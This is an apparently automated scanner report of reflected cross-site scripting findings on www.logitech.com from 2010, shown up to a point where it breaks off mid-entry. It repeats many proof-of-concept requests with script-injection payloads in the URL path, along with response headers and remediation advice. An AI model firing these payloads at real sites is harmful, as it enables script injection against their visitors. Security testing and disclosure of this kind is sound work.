The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3259</script><script>alert(1)</script>3a9e91f1d98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c3259</script><script>alert(1)</script>3a9e91f1d98/30814/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbf7"><script>alert(1)</script>9dbad03446c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /8cbf7"><script>alert(1)</script>9dbad03446c/31147/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfec6</script><script>alert(1)</script>6b1531269f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dfec6</script><script>alert(1)</script>6b1531269f5/31147/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8154</script><script>alert(1)</script>000448d7f83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f8154</script><script>alert(1)</script>000448d7f83/31148/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64dd6"><script>alert(1)</script>88847320300 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /64dd6"><script>alert(1)</script>88847320300/31148/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3e90</script><script>alert(1)</script>8c4d73a7c92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d3e90</script><script>alert(1)</script>8c4d73a7c92/31151/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138f5"><script>alert(1)</script>41212ac5e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /138f5"><script>alert(1)</script>41212ac5e5d/31151/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76ed</script><script>alert(1)</script>0a7cb6d3eaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e76ed</script><script>alert(1)</script>0a7cb6d3eaa/31156/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44030"><script>alert(1)</script>758a22a1891 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /44030"><script>alert(1)</script>758a22a1891/31156/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ff0c</script><script>alert(1)</script>cd569d55617 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9ff0c</script><script>alert(1)</script>cd569d55617/31159/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72107"><script>alert(1)</script>dc267133a52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /72107"><script>alert(1)</script>dc267133a52/31159/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b388</script><script>alert(1)</script>2fdf704614a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8b388</script><script>alert(1)</script>2fdf704614a/31161/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5a8"><script>alert(1)</script>e902e39d808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /9d5a8"><script>alert(1)</script>e902e39d808/31161/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74280</script><script>alert(1)</script>625fc2ddf1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /74280</script><script>alert(1)</script>625fc2ddf1b/31162/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b4e"><script>alert(1)</script>56ef9aed460 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /b9b4e"><script>alert(1)</script>56ef9aed460/31162/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1be12</script><script>alert(1)</script>2744b2569f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1be12</script><script>alert(1)</script>2744b2569f5/31163/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be596"><script>alert(1)</script>4b49c2ddca6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /be596"><script>alert(1)</script>4b49c2ddca6/31163/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bed</script><script>alert(1)</script>bff5dcc6c3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /78bed</script><script>alert(1)</script>bff5dcc6c3f/31246/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e89"><script>alert(1)</script>65b1efb4be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /d0e89"><script>alert(1)</script>65b1efb4be6/31246/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2412</script><script>alert(1)</script>b9b9be1673f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c2412</script><script>alert(1)</script>b9b9be1673f/31254/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37054"><script>alert(1)</script>804e8fe3a5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /37054"><script>alert(1)</script>804e8fe3a5c/31254/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45607"><script>alert(1)</script>73821424e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /45607"><script>alert(1)</script>73821424e66/31677/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e63ae</script><script>alert(1)</script>f1eeb453aae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e63ae</script><script>alert(1)</script>f1eeb453aae/31677/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c6fe</script><script>alert(1)</script>eaf84f7ce9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /6c6fe</script><script>alert(1)</script>eaf84f7ce9d/31923/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba30"><script>alert(1)</script>1f3588020d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /6ba30"><script>alert(1)</script>1f3588020d7/31923/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb32a</script><script>alert(1)</script>7ade0831ab8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
